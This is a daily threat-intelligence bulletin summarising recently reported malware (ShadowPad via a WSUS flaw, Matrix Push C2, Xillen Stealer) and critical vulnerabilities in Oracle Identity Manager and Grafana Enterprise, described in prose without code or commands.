Cyware Daily Threat Intelligence, November 24, 2025

State-sponsored hackers are turning a critical Windows maintenance tool into a gateway for espionage. A vulnerability in WSUS is being actively exploited to deploy the ShadowPad backdoor, a favorite tool of Chinese threat groups. The attackers use legitimate system utilities to slip past defenses and gain full control over compromised servers.

That harmless-looking browser notification might actually be a sophisticated trap. A new MaaS platform called Matrix Push C2 is using browser alerts to launch fileless phishing attacks across different operating systems. By mimicking legitimate system warnings or login alerts, attackers can trick users into clicking malicious links without ever needing to install a file on the device.

Grafana has issued a warning for a "perfect 10" severity vulnerability that could let attackers walk right into administrator accounts. The critical flaw in Grafana Enterprise affects the SCIM user provisioning feature, allowing a malicious user to overwrite internal IDs and take over high-privilege accounts.

Top Malware Reported in the Last 24 Hours

ShadowPad malware abuses WSUS flaw

A recently discovered vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been actively exploited by threat actors to distribute ShadowPad malware. This modular backdoor, associated with Chinese state-sponsored hacking groups, allows attackers to gain full system access by executing remote code with system privileges. The exploitation process involves using legitimate Windows utilities like PowerCat, certutil, and curl to download and install ShadowPad after initially breaching the system. ShadowPad employs DLL side-loading techniques, leveraging a legitimate binary to execute malicious payloads while incorporating various anti-detection methods.

Matrix Push C2 exploits browser notifications

Matrix Push C2 is a new C2 platform that utilizes browser notifications for fileless, cross-platform phishing attacks. By tricking users into allowing notifications through social engineering tactics, attackers can send alerts that appear to originate from the operating system or browser. These notifications often mimic legitimate messages, such as suspicious login alerts, leading victims to click on malicious links. This innovative approach bypasses traditional security measures, creating a persistent communication channel with victims across various platforms. Offered as a malware-as-a-service, Matrix Push C2 is sold through crimeware channels, allowing attackers to customize their phishing campaigns with templates that impersonate well-known brands. Additionally, the platform provides tools for tracking victim interactions and analyzing the effectiveness of their attacks

Xillen Stealer evolves with advanced features

Xillen Stealer, a Python-based information-stealing malware, has evolved into versions 4 and 5, significantly enhancing its targeting capabilities. This cross-platform tool now extracts sensitive data, including credentials from password managers and cryptocurrency wallets, while employing advanced anti-analysis techniques to evade detection. Notably, the AIEvasionEngine module mimics legitimate user behavior to bypass AI-based detection systems. Additionally, it collects data from various enterprise applications and cloud services, demonstrating a focus on high-value targets. The malware utilizes multi-layered exfiltration methods, including steganography and anonymizing networks, to obscure its activities. Marketed on Telegram with a professional GUI, Xillen Stealer poses a growing threat to organizations managing sensitive information, as its comprehensive feature set continues to develop.

Top Vulnerabilities Reported in the Last 24 Hours

CISA warns of actively exploited Oracle 0-day

The CISA has added a critical vulnerability in Oracle Identity Manager, identified as CVE-2025-61757, to its KEV catalog due to evidence of active exploitation. This vulnerability, which has a CVSS score of 9.8, allows unauthenticated remote attackers to execute code by bypassing authentication for critical functions. Specifically, attackers can manipulate API endpoints by appending certain strings to the URI, enabling them to escalate privileges and access sensitive systems. Observations of honeypot logs revealed multiple attempts to exploit this flaw before Oracle issued a patch, indicating that it may have been targeted as a zero-day vulnerability. As a result, federal agencies are mandated to apply necessary patches by December 12, to protect their networks from potential breaches.

Grafana patches max severity flaw

Grafana has released security updates to address a critical vulnerability (CVE-2025-41115) in its System for Cross-domain Identity Management (SCIM) component, which enables user provisioning. This flaw, present in Grafana Enterprise versions 12.0.0 to 12.2.1, poses a risk of privilege escalation and user impersonation if specific configurations are enabled. The vulnerability allows a malicious SCIM client to provision users with numeric external IDs, potentially overriding internal user IDs and granting unauthorized access. The issue has a maximum severity score of 10.0, emphasizing its serious nature and the need for immediate attention. Grafana has addressed the flaw in subsequent software versions to enhance security.